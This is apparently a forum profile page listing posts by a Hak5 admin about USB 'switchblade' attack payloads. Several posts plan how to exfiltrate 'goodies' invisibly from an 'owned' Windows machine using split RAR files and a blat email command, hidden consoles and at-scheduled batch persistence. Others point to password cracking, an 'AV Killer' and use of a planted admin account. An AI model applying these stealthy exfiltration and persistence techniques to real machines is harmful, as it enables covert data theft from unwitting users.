Darren Kitchen

Root Admin
  • Posts

    4,887
  • Joined

  • Days Won

    248

Everything posted by Darren Kitchen

  1. Mmm... Now I really want a great big bowl of hax0rflakes. *looks to his left* Well, what do ya know! *eats hax0rflakes right out of the box*
  2. I'll try it this afternoon. I was able to get this hack, the USB Hacksaw, working on a guest account so that's pretty exciting stuff. Unfortunately the IFMEMBER command doesn't work so I've got a lot of redundancy in my script which could be cleaned up if I knew if the logged in user was guest or power user/admin. then again maybe creating a directory in %systemroot% and checking the errorlevel would help determine that since guests can't do that. ahh, POC code.... you know how it goes. just enough to make it work.
  3. burn my land, boil my sea, you can't take the sky from me
  4. Hak5 does not encourage or condone illegal activities. As for what I did on my school network? I'll plead the Hak5th.
  5. It doesn't get any easier than this: http://www.antsight.com/zsl/rainbowcrack/d...wcrack_cfg5.txt Follow by example. Good luck with your hacking.
  6. Very sweet. Makes switchblade more powerful. Edit: http://www.hak5.org/wiki/AV_Killer
  7. http://www.hak5.org/wiki/Episode_2x02#Over...emory_Trade-Off
  8. finished the hack. thanks for all the help guys!
  9. Not quite working

     S:\>cscript send.vbs goodies*
     Microsoft (R) Windows Script Host Version 5.6
     Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
     S:\send.vbs(19, 30) Microsoft VBScript compilation error: Syntax error

     for me 19,30 is where it does the -to emailaddress. Seems that "to" is a vbs command; it's parsing it wrong. what's the escape character for vbs?
  10. ok I've got everything working now except for one last thing. (I say that now but once the proof of concept is done you know feature creep will set in). anyway, here's the problem and I'm sure it's something that could be done with a simple loop in batch. I'd R the FM but I'm crashing hard after not sleeping for a few days so I'll be lazy and ask. here's the deal: the hack is done. the goodies have been retrieved. then rar'd for size. to keep things simple we're using email with ssl which means attachment size needs to be low. if the goodies are less than 5 MB it's no issue, a single rar file will do the trick. but if we've got say, three 5 MB rar files to email we'll need a loop. Here's what we've got: goodies.r00 goodies.r01 goodies.r02 and we need to do this to each file: blat.exe <filename> -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 I'm absolutely exhausted. I'm going to crash and pick this back up in the morning. If anyone has a potential solution or suggestion let me know. Oh, and thanks for everyone's input and help on this project. I won't forget your names when doing the segment this weekend.
  11. got it working so that once the right parameters are met the data retrieval will begin and invisibly run the batch file. that's part 1. I've got the tools and commands to send email attachments via command line. that's part 3. now part 2 is rar'ing the files for delivery. shouldn't be long now.
  12. ok so blat doesn't work with gmail smtp out of the box. it doesn't handle ssl correctly. supposedly stunnel can be used to wrap it correctly. I'm looking for some info on that now. also turns out that EXACTLY what we need has already been written at: http://weblogs.asp.net/nleghari/articles/gmailbackup.aspx *however*, it requires dot net framework 2.0, and it adds an icon to the systray. bummer! could have been perfect.
  13. So it turns out that gmail has its own smtp server. oops. forgot about that. I'm pretty sure blat will work with its auth requirements too. *scha-wing* testing...
  14. Blat really looks like the best option for this hack. We just need a lightweight, command line, local SMTP relay. http://sapes.sourceforge.net/docs/configur...html#config.txt and http://emailrelay.sourceforge.net/ look ok at first glance. I'm digging deeper right now. If we can get email to send without the use of the 3rd party SMTP server that will fix one of the problems. I do believe I saw a program a while ago that will allow you to register a BAT as a service. If that's the case all we need is a batch file that runs a loop to process a few commands every 6 hours or so. Actually, know what? As I type this I think there may be a better way to initiate all of this, but it would require just a tiny itty bit of C code. I've got the source of the utility that I'm basing this hack off of. It runs resident and performs a data gathering action when certain parameters are met. Since it's already resident in memory and initiates the hack when it's needed the best solution would be to at least run the batch once it's done with the data stealing. I haven't touched C since a programming class 4 years ago, but I've been keeping up with PHP which in a very loose way is similar so maybe I'll try a dirty hack and just add a system() command to initiate the batch. Then I just need to find a half decent C compiler for windows and make this bad boy. Assuming that all works the only thing left is to transmit the data, and I think between RAR to split the files, a local SMTP mail transfer agent, and blat, this is totally doable. I know I'm being a bit vague. I apologize. If you've got C experience and want to help with this I can give you all the details on IRC, PM, skype conf, etc. I'll be up all night working on this so if you're up for some fun let me know.
  15. Ok, consider it's 32 MB. How does that change things? Also, transfer of this data does not need to be secure. I really like pseudobreed's idea of splitting the data in RAR files and sending out to a junk gmail/yahoo mail/etc account using blat, however three problems come to mind.
      1. Blat is an awesome tool for sending attachments through SMTP via command line, but as far as I know blat does not have its own SMTP server, thus requiring an open SMTP server, or SMTP server from the ISP. Not going to work.
      2. AT command schedules tasks really nicely, but the command will show up in the Scheduled Tasks folder in control panel. Sure it's not a biggie but it'd be better if it wasn't that visible. An invisible (to the average user) application that runs on startup might do the trick.
      3. "Batch it all up." Now you're speaking my language. Quick and dirty, easy to modify, but one little problem. Not so much with the stealthy. Though I must say I haven't tried using the .vbe from the switchblade to run the command without a visible console. that might solve the problem.
      Anyway for what I'm trying to do this is the closest thing to a solution I've seen yet. I'm on all night working on this hack so if you want to get a hold of me I'm on irc.hak5.org #hak5 and skype: username Hak5Darren.
  16. There are several ways to use the admin user account created by the USB switchblade. Start by getting familiar with this: http://www.ss64.com/nt/net_use.html Then get creative with this: http://www.microsoft.com/windowsxp/downloa...rdclientdl.mspx
  17. Sorry for double post. Just downloaded pseudobreed's payload to analyze. Came in at 8 KB/s. Here are hak5.org mirrors http://www.hak5.org/releases/2x02/switchbl...uzer_Loader.zip PS: This is a really elegant payload. It should be added to the wiki. Edit: Scratch that, I can't seem to download the Payload zip. The download quits after a minute and I only get 10%. Could you mirror somewhere?
  18. pseudobreed, I follow your payload so far except this threw me for a loop.

      :: Schedule Update
      :: Parse Time
      for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do (
          set hh=%%a
          set mn=%%b
          set ss=%%c
          set ds=%%d
      )
      :: Add 5 Minutes
      set /a mn=mn+5
      :: If Min is less than 10, add 0 to front
      if %mn% LSS 10 set mn=0%mn%
      :: Sched Next Update
      at %hh%:%mn% %windir%\system32\sched.bat
      :: Done

      Can you explain this part of your batch in more detail? I'm currently working on a hack for the next episode that I'm almost done with, except for a little issue with retrieving "goodies" that the program gathers. It needs to run at a set interval and upload said goodies to a remote location without the user noticing. I'd rather not use the windows task scheduler and any way to suppress a command window would be best. If you could clear that up for me or offer any suggestions on my problem that would be a great help. The hack I'm working on has some really big potential if I can just get the data off the owned machine automatically and without notice.
  19. maybe I should clarify a bit. We're talking about potential tens to hundreds of megabytes, though likely only tens at a time. I agree that a public drop point is better than a specific drop point for anonymity sake. So, would anyone happen to know of some code that already does something like this? I'm so close to having this thing complete and it's a really sweet hack but without the *have owned box send goodies somewhere* part it's not as sweet. I know with some time we could probably code up something that splits up the data into chunks and uses stenography to upload the data to flickr, but I don't have the tools or time. Grr. Stupid deadline.
  20. You forgot something moonlit...
  21. Say, hypothetically, that we've owned a box. Box of course being a Windows 2000, XP, or 2003 computer. And that box is now doing some data recovery for us. And you no longer have access to the box either over the web or physically, but you want it to transmit the data that it's been gathering to you somehow. It needs to do this periodically and invisibly. That means that a scheduled task set to run a batch script which initiates an FTP connection to "the mothership" in order to upload said goodies isn't the best solution. How would you go about it? Remember, this box is owned and whatever owned it can install whatever is necessary to make this happen. My thinking is a simple program that runs resident and FTP, SFTP, whatever's the goodies back home on a set interval without showing up in the usual places. Invisibility to the user is a must. Thoughts? Oh, and in case you're wondering, yes this is the second half of a problem I'm having with a proof of concept hack for the next episode so the sooner I figure out how to get the goodies back home, the better. Mad props for any working solution. ;)
  22. at least not your personally identifiable information :P I like that ;)....
  23. I saw the subject line and was about to pop in and say truecrypt. Then I read the body and realized that it's not an option for you. I too would be interested if anyone else has a solution for encryption on Windows without admin access.
  24. 1. Don't keep personally identifiable information on a switchblade
      2. Don't keep personally identifiable information on a switchblade
      3. Don't keep personally identifiable information on a switchblade
      4. See #1